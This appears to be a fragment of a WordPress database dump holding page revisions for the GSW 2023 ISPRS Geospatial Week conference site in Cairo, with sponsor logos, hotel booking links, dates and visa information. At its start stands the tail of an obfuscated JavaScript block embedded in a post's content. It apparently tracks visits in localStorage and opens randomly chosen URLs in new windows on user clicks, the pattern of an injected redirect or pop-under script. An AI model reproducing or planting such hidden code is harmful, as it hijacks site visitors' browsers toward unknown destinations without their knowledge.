_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:21:22','2023-07-25 02:21:22','',3066,'https://gsw2023.com/?p=5048',0,'revision','',0),
(5049,1,'2023-07-25 02:23:27','2023-07-25 02:23:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251414155{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251587234{margin-top: 25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" 